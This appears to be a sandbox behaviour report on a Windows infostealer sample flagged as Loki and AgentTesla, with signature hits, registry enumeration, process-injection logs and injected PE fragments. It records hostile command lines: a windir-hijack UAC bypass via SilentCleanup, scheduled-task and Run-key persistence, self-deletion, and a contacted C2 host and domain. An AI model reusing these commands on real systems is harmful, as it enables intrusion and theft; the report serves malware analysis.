description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Communications over HTTP rule Network_HTTP
description Win32 PWS Loki rule Win32_PWS_Loki_Zero
description Run a KeyLogger rule KeyLogger
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Run a KeyLogger rule KeyLogger
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
description Run a KeyLogger rule KeyLogger
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Communications over FTP rule Network_FTP
description Win.Trojan.agentTesla rule Win_Trojan_agentTesla_Zero
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000640
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00020019
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
2 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2112
process_handle: 0x000004fc
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2112
process_handle: 0x000004fc
1 0 0
cmdline reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
cmdline /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
cmdline reg delete hkcu\Environment /v windir /f
cmdline schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline schtasks.exe /Create /TN "Updates\pYVWAjXtpzU" /XML "C:\Users\test22\AppData\Local\Temp\tmpF3DA.tmp"
cmdline "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYVWAjXtpzU" /XML "C:\Users\test22\AppData\Local\Temp\tmpF3DA.tmp"
cmdline cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcvb.exe"
host 34.88.140.135
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2524
region_size: 598016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004ec
1 0 0

NtAllocateVirtualMemory

process_identifier: 2112
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f0
3221225496 0

NtAllocateVirtualMemory

process_identifier: 1188
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f4
1 0 0

NtAllocateVirtualMemory

process_identifier: 3056
region_size: 73728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000394
1 0 0

NtAllocateVirtualMemory

process_identifier: 2408
region_size: 212992
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002b0
1 0 0

NtAllocateVirtualMemory

process_identifier: 2164
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002b0
1 0 0

NtAllocateVirtualMemory

process_identifier: 1920
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002b0
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Xypgtv reg_value C:\Users\Public\vtgpyX.url
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.py
file C:\Python27\agent.pyw
file C:\Users\test22\AppData\LocalLow\iK0eK1lK3k\agent.pyw
Process injection Process 260 manipulating memory of non-child process 2112
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2112
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f0
3221225496 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÌNäˆ/ŠOˆ/ŠOˆ/ŠOÓG‰N™/ŠOÓGN4/ŠOÓGN‰/ŠO]BŽN›/ŠO]B‰N/ŠO]BNÚ/ŠOÓGŽN‘/ŠOÓGŒN‰/ŠOÓG‹N“/ŠOˆ/‹Ox/ŠOAƒN‡/ŠOAˆN‰/ŠORichˆ/ŠOPELIJW`à Žt[Ü @ @ÐBÀL[Ø8HØ@ ¤.text}ŒŽ `.rdataP¸ º’@@.data\`LL@À.relocL[À\˜@B
base_address: 0x00400000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ ˜$„¦°@@Оà\CODE°–˜ `DATAl°œ@ÀBSSÅÀ¤À.idatažÐ¤@À.reloc\à¬@PÄ@P
base_address: 0x00400000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

buffer: @2‹À@@@\@ì @l$@ËÌÈÉ×ÏÈÍÎÛØÚÙÊÜÝÞßàáãäå@Error‹ÀRuntime error at 00000000‹À0123456789ABCDEFÿÿÿÿàO@‹À‹À@@J7<äºÏ¿}ªiFîµä[Jú-EœÝ]³QçëqØ'ÓØ'ÓØ'ÖØ7nØ$ÓsØ$ÓsØ$nsØ7ÓsØ7ÖsØ$ÓØ7Ø7ÖØ7ÖsØ$ÓØ$nsØ$nsØ7Ø$ÓØ$nsØ$nsØ7ÖsØ$ÓsØÔØ'ØØsØXØ$ÓØ'ÖØqØ'ÖØ–áveÛe3ôs>v÷†E±Yêá)­Vû˜Ar5d2Š'òÂØMY‰ pê5ù©ñÌ-þ+~•R¶Ö”æÐvMºoß3 v§·5v…ÅÞƒ¸`‡6©¤á þáx.¢WŽ‹ï)b!ò²jíïz´Ì·|X—¸q/Õæ?dEzãîs£‹3Ãhp>4Ǝ7èˆJ|—úðØèëá¾iAò¡úèÌ3áHþ‰‡ˆíG\†rgã@À Œ¥[\ë¸?áRÃénS ÑÒ-´¼;ÐÍñ[MQ¶SEvr]‚`„U¥’ÝêŽ(èú†mü'~àÖ.‘ÚÅÂÅÈ3Â%G°’j°Uî½S:Ì¦æä[½V€¿v™z½åÁL}¸<ÿ,9ŠÞýžV_‹ƒ:Â9 ‘牽˜W‡ù™ÙÔەoŸSûËۓ`Qé6ñ¡àw—Ëm¥Anm'o-”°aÃе1ä¨ 5[þ'Çè ©Ð¦¿q ¤ÞÆ +ºê$›gÌ7¶G~Ø: ðDºÜÑk½´úÓæ`¸{ÈQÖÎ*<A…æ>5²+X2`*ÿ0e¢÷¼Aâ@ŽPD„%ÌÐÒ:¨»eŠfk®Z‹¨ÃÌPÒÕ*”cÕéN{» “¨¤…¦b«?O±óÝ0ZR‡ÔžèÌÚÃOË©¤×`TwR\ŽÀàÄËÃÐÃsS¦@O±j¹ ›}¢ì J˜g_ÍYljò‘ ˜@Ž'”¸…PÂZ°)zˆãp>cƒŒXgǼ|½\ÏODn…á)ü7Lôû8ažŒ³Ô´:3ªÆô딛¥ø‘GgPnº1½·Õ“Ô^)õ/2{ۘ¸<T¾i#©È7ný_Fû^îˆnB!ôëäRÛc-dèmàÇ«>WÆÄN䨂«$há:_p”$Öd^}QÏ ˜kï8áeÏÌË%VŒ¿âFNØ\ðø•G;æ1Èy¤SÇ,•„°!#fñމÄþ j®Þ Ø|íälçÇ+ÆÚ E—Å Å$ŒÜ›¶Dë Í!kù,ú"dlQ(° ÇMIÎ,p#°)]”ÕÙ9i-0‚àl&‘®ª!YіoPÝ+¾‡9•}\±¡©Ù.¿4#D.•§×è¼R I±£ç— 1ÔTû_v¿tÂmÿóJQ÷Ð\pk+Fæ*_h:÷Ù ‡æÄ £ 8 c+-’û2_öš0ýcQò¸ dt‰µ+ûÞ™¸¦åð‰#t êqêR(PY» ïÀ(¢#ÓϘÆ”ÌzÓ ¯N$ÇAÇAôÆApÇA¤ÆA„ÇA@ÇAhÇAlÆA,ÇA¼ÆAÇA°ÆAÆAÄÆA´°A”ÇAÇAˆÇA(ÈA\ÇAüÆA4ÇA|ÆAŒÆAìÆA ÇA<ÇA¸°AèÆA¤ÇA°°AÀÆAŒÇA¸ÆAdÆA°ÇAðÆA ÇA´ÆA(ÇAÈÇAذA¼°A˜ÆA ÇAÇAÇAœÆA ÆA8ÇA¬ÆAPÇA¬ÇAˆÆALÇAøÆAÌÆADÇA`ÇA¬°A ÈA¨ÇA˜ÇAÇAÈÆA€ÆAœÇA”ÆA0ÇAhÆAHÇA´ÇAveronika.ac.ug
base_address: 0x0041b000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

buffer: ,ÒÜÐ ÔHÑXÔXјÔhÑàÔxÑÕ€Ñ8ՐѺÖðÑ*× Òp× Ò:ÒRÒjÒ‚ÒžÒ¬Ò¼ÒÈÒÖÒæÒÓÓ$Ó:ÓPÓbÓtӊӜӮӼÓÊÓÖÓòÓþÓÔ,Ô>ÔLÔfÔzÔŠÔ¦Ô¶ÔÌÔîÔÕ Õ.ÕFÕRÕZÕfÕxÕˆÕ˜Õ¦Õ¶ÕÆÕØÕìÕÖÖ.ÖBÖPÖ`ÖrÖ~֌֚֮ÖÄÖÔÖäÖðÖ× ×6×B×V×^×z׊×kernel32.dllDeleteCriticalSectionLeaveCriticalSectionEnterCriticalSectionInitializeCriticalSectionVirtualFreeVirtualAllocLocalFreeLocalAllocGetTickCountQueryPerformanceCounterGetVersionGetCurrentThreadIdWideCharToMultiByteMultiByteToWideCharGetThreadLocaleGetStartupInfoAGetModuleFileNameAGetLocaleInfoAGetCommandLineAFreeLibraryExitProcessWriteFileUnhandledExceptionFilterRtlUnwindRaiseExceptionGetStdHandleuser32.dllGetKeyboardTypeMessageBoxACharNextAadvapi32.dllRegQueryValueExARegOpenKeyExARegCloseKeyoleaut32.dllSysFreeStringSysReAllocStringLenSysAllocStringLenkernel32.dllGetModuleHandleAadvapi32.dllRegOpenKeyExARegEnumKeyAFreeSidkernel32.dllWriteFileSleepLocalFreeLoadLibraryExWLoadLibraryAGlobalUnlockGlobalLockGetTickCountGetSystemInfoGetProcAddressGetModuleHandleAGetModuleFileNameAGetFileAttributesWGetCurrentProcessIdGetCurrentProcessFreeLibraryFindNextFileWFindFirstFileWFindCloseExitProcessDeleteFileWCreateDirectoryWCopyFileWgdi32.dllSelectObjectDeleteObjectDeleteDCCreateCompatibleDCCreateCompatibleBitmapBitBltuser32.dllReleaseDCGetSystemMetricsGetDCCharToOemBuffAole32.dllOleInitializeCoCreateInstance
base_address: 0x0041d000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à ¨ Ç à@  @…ÄÆWàÿ  H.text$§ ¨ `.rsrcÿàª@@.reloc ²@B
base_address: 0x00400000
process_identifier: 3056
process_handle: 0x00000394
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€ àÌlã“Ì4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°,StringFileInfo000004b0Comments"CompanyName*FileDescription0FileVersion1.0.0.02 InternalNameStub.exe&LegalCopyright*LegalTrademarks: OriginalFilenameStub.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly>
base_address: 0x0040e000
process_identifier: 3056
process_handle: 0x00000394
1 1 0

WriteProcessMemory

buffer: À 7
base_address: 0x00410000
process_identifier: 3056
process_handle: 0x00000394
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 3056
process_handle: 0x00000394
1 1 0

WriteProcessMemory

